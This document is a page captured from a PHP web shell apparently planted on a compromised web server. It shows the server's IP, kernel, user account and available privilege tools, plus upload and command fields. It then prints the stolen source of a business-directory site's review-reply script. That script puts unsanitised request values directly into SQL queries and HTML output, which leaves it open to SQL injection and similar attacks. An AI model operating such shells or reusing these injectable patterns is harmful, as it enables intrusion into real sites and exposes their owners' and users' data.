403Webshell
Server IP : 51.89.169.208  /  Your IP : 3.148.107.92
Web Server : Apache
System : Linux ns3209505.ip-198-244-202.eu 4.18.0-553.27.1.el8_10.x86_64 #1 SMP Tue Nov 5 04:50:16 EST 2024 x86_64
User : yellowleaf ( 1019)
PHP Version : 7.4.33
Disable Function : exec,passthru,shell_exec,system
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/yellowleaf/public_html/members/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ Back ]     

Current File : /home/yellowleaf/public_html/members//review_reply.php
<? 
$path  = $_SERVER['DOCUMENT_ROOT'];
include_once $path.'/connect_db.php';
include 'accesscontrol.php';
// css for menu
$styleManage = 'color:#ff6131;background-color:#fff;border-top:1px solid #c9c9c9;font-weight:bold;';
$revid=$_GET['revid'];
$adid=$_GET['adid'];
// check if advert beleongs to members
if(advert_check($adid,$memberid)===false){header('Location: index.html');exit();}
if(isset($_POST['submit'])){

	$rev_reply=$_POST['reply'];	
	$rev_email=$_POST['email'];	
	$rev_name=$_POST['name'];
	$adid=$_POST['adid'];
	$q3 = "UPDATE reviews SET rev_reply = '$rev_reply' WHERE rev_id='{$revid}'";
	$r3 = $connect->query($q3) or die($connect->error);
	
	$select_ad = $connect->query("SELECT * FROM ads WHERE adid ='{$adid}'");
	$b=$select_ad->fetch_array();	
	$r_ad_name=strtolower($b['companyname']);
	$ad_name=str_replace(" ","-",$r_ad_name);
	
	$to  = "$rev_name <$rev_email>";
	$subject = 'Review Reponse - YellowLeaf';
	$email_message = '
		<div style="margin-bottom:5px;">Dear <b>'.$rev_name.'</b></div>
		<div>
		The owner of '.$b['companyname'].' has made a response to your review at YellowLeaf. Please click on the link below to view your review.<br><br>
		<a href="http://www.yellowleaf.co.uk/pages/'.$adid.'-'.$ad_name.'.html">Click here to view the response.</a>
		</div>';
	
	// message template which includes $message and $email_message 
	include '../email_tmp/em_tmp.php';

	// To send HTML mail, the Content-type header must be set
	$headers  = 'MIME-Version: 1.0' . "\r\n";
	$headers .= 'Content-type: text/html; charset=iso-8859-1' . "\r\n";

	$headers .= 'From: YellowLeaf <support@yellowleaf.co.uk>' . "\r\n";
	mail($to, $subject, $message, $headers,"-f support@yellowleaf.co.uk");
	
	$success=TRUE;
}
// selecting review
$r7 = $connect->query("SELECT * FROM reviews WHERE rev_id ='{$revid}' LIMIT  1");
if($r7->num_rows<1){header('Location: index.html');} // check if content belongs to user else redirect
$rev_numRow=$r7->num_rows;
		if($rev_numRow>0){
			$rev_row = mysql_fetch_array($r7);
				$reviewContent .= '<div style="background-color:#fafafa;padding:0px 40px 20px;margin-top:20px;" class="curv7">';
				$reviewContent .= '<table class="revTbl" width="100%">';
				$ratings[] = $rev_row['rev_rating'];
				//if($rev_row['rev_reply']!=''){$revStyleCss1='border-bottom:1px solid #999;';}else{$revStyleCss='padding-bottom:40px;border-bottom:1px solid #999;';}
				$reviewContent .= '<tr><td valign="top" style="padding-top:20px;'.$revStyleCss.'">';
				$reviewContent .= '<div style="font-size:18pt;color:#294576;">'.$rev_row['rev_name'].'</div>';
				$reviewContent .= '<div style="margin-top:6px;font-size:10pt;color:#666;"><b>Review given on: </b>'.date('d/m/Y',$rev_row['rev_date']).'</div>';
				$reviewContent .= '<div class="curv7" style="margin-top:15px;background-color:#fff;padding:15px;border:1px solid #a8a8a8;">'.htmlentities($rev_row['rev_comment']).'</div></td>';
				$reviewContent .= '<td valign="middle" style="text-align:center;width:155px;padding-top:20px;padding-left:20px;'.$revStyleCss.'"><div style="font-size:20pt;font-weight:bold">';
				$reviewContent .= $rev_row['rev_rating'].'/5<br><img class="rate_'.$rev_row['rev_rating'].'" src="/img/img_trans.gif" width="1" height="1" /></div></td></tr>';				
				
				if($rev_row['rev_reply']!=''){
					$reviewContent .= '<tr><td colspan="2" style="padding:20px 30px 20px 60px;'.$revStyleCss1.'">';
					$reviewContent .= '<div class="curv7" style="background-color:#eee;padding:15px;border:1px solid #a8a8a8;"><b>Your Response ...</b><br>';
					$reviewContent .= htmlentities($rev_row['rev_reply']).'</div></td></tr>';
				}
				
				$revStyleCss='';$revStyleCss1='';
				$reviewContent .= '</table></div>';	
			$arr_sum = array_sum($ratings);
			$mean = $arr_sum  / $rev_numRow;
			$average = round($mean*2)/2; // round to the nearest half
			$averageCss=str_replace(".","-",$average);
			$advert_rating='<img class="rate_'.$averageCss.'" src="/img/img_trans.gif" width="1" height="1" /><meta itemprop="rating" content="'.$average.'" /> ';
		}else{
			$error = TRUE;
		}
?>
<!DOCTYPE html>
<html>

<head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<title>YellowLeaf UK</title>
<link href="style.css" rel="stylesheet" type="text/css">
<style>
.det_cnt{padding:30px;border-bottom:1px solid #cecece;}
.det_head{color:#15c;font-size:14pt;margin-bottom:5px;font-weight:bold;}
.det_info{color:#222;line-height:21px;}
.opTbl td{padding:10px}
.smlPic{width:130px;margin:0px;}
.imgShadd{-moz-box-shadow:0px 2px 3px 0px #666; -webkit-box-shadow: 0px 2px 3px 0px #666; box-shadow:0px 2px 3px 0px #666;}
.bxShadd{-moz-box-shadow:0px 2px 6px 0px #E4E4E4; -webkit-box-shadow:0px 2px 6px 0px #E4E4E4; box-shadow:0px 2px 6px 0px #E4E4E4;}
.picCn{height:80px;overflow:hidden;margin-bottom:15px;}
.promoTbl td{padding:20px 0px;<?=$promCss?>}
.rate_0{width:101px;height:19px;background:url(/img/stars.png) 0 0;}
.rate_0-5{width:101px;height:19px;background:url(/img/stars.png) 0 -20px;}
.rate_1{width:101px;height:19px;background:url(/img/stars.png) 0 -39px;}
.rate_1-5{width:101px;height:19px;background:url(/img/stars.png) 0 -58px;}
.rate_2{width:101px;height:19px;background:url(/img/stars.png) 0 -77px;}
.rate_2-5{width:101px;height:19px;background:url(/img/stars.png) 0 -96px;}
.rate_3{width:101px;height:19px;background:url(/img/stars.png) 0 -115px;}
.rate_3-5{width:101px;height:19px;background:url(/img/stars.png) 0 -134px;}
.rate_4{width:101px;height:19px;background:url(/img/stars.png) 0 -153px;}
.rate_4-5{width:101px;height:19px;background:url(/img/stars.png) 0 -172px;}
.rate_5{width:101px;height:19px;background:url(/img/stars.png) 0 -191px;}
</style>
<script>
function showRev(){
document.getElementById('review').style.display='';
document.getElementById('hideBtn').style.display='';
document.getElementById('showBtn').style.display='none';
}

function hideRev(){
document.getElementById('review').style.display='none';
document.getElementById('hideBtn').style.display='none';
document.getElementById('showBtn').style.display='';
}
function textCounter(field1, cntfield1, maxlimit) {
var field = document.getElementById(field1);
var cntfield= document.getElementById(cntfield1);
  if(field.value.length > maxlimit) // if too long...trim it!
  field.value = field.value.substring(0, maxlimit);
  else cntfield.value = maxlimit - field.value.length;
}
</script>
</head>

<body>

<? include 'header.php'; ?>
<table class="tbwdth">
	<tr>
		<td valign="top" style="width:210px;"><? include 'member_menu.php'; ?>
		</td>
		<td valign="top" class="cnGrad">
		<?if($error==FALSE){?>
		<div class="cnHead" style="margin-bottom:15px;">Review Reply</div>
		<?if($success==TRUE){?>
		<div class="successDvBx">
		Your response has been made successfully. <br><a href="review.html?adid=<?=$rev_row['rev_ad_id']?>">Go back to reviews ></a>
		</div>
		<?}else{?>
		<div class="curv3" style="border:1px solid #bbb;padding:20px;background-color:#fdfdfd;margin-bottom:20px;">
		<?if($rev_row['rev_reply']==''){?>
			<form action="review_reply.html?adid=<?=$adid?>&revid=<?=$revid?>" method="POST">
			<div style="font-weight:bold;font-size:12pt;color:#404855;">Reply to: <?=$rev_row['rev_name']?></div>
			<div style="font-size:10pt;font-weight:bold;color:#9d3333;margin:10px 0px 4px;">Please note: Your reply will be made public.</div>
			<textarea style="width:590px;"  onkeydown="textCounter('reply','remLen1',250)" id="reply" name="reply" rows="5"></textarea>
			<div style="margin-top:5px;">
				<input readonly="" type="text" id="remLen1" name="remLen1" size="3" maxlength="3" value="250" style="background-color:#fcfcfc;border:1px solid #aaa;padding:5px;"> Characters left
			</div>
			<input type="hidden" name="email" value="<?=$rev_row['rev_email']?>">
			<input type="hidden" name="name" value="<?=$rev_row['rev_name']?>">
			<input type="hidden" name="adid" value="<?=$rev_row['rev_ad_id']?>">
			<input type="submit" name="submit" class="blueBtn fancyBtn" style="border:0px;float:none;margin-top:10px" value="Reply to Review >>">
			<a style="float:none;font-weight:bold;" href="review.html?adid=<?=$rev_row['rev_ad_id']?>">Go back to reviews ></a>
			</form>
		<?}else{?>
			You have already replied to the review!<br><br>
			<a class="blueBtn fancyBtn" style="float:none;" href="review.html?adid=<?=$rev_row['rev_ad_id']?>">Go back to reviews ></a>
		<?}}?>
		</div>
		<hr noshade color="#C0C0C0" size="1">
		<input type="button" class="redBtn fancyBtn" id="hideBtn" style="border:0px;float:none;" onclick="hideRev()" value="Hide Review">
		<input type="button" class="blueBtn fancyBtn" id="showBtn" style="border:0px;float:none;display:none;" onclick="showRev()" value="Show Review">
		<div id="review">
		<?=$reviewContent?>
		</div>
		<?}else{?>
		<div class="cnHead" style="margin-bottom:15px;">ERROR!</div>
		<div style="font-size:11pt;font-weight:bold;">Review does not exist! <a href="index.html">Go back to Manage Advert ></a></div>
		<?}?>
		</td>
	</tr>
</table>
<? include 'footer.php'; ?>

</body>

</html>

Youez - 2016 - github.com/yon3zu
LinuXploit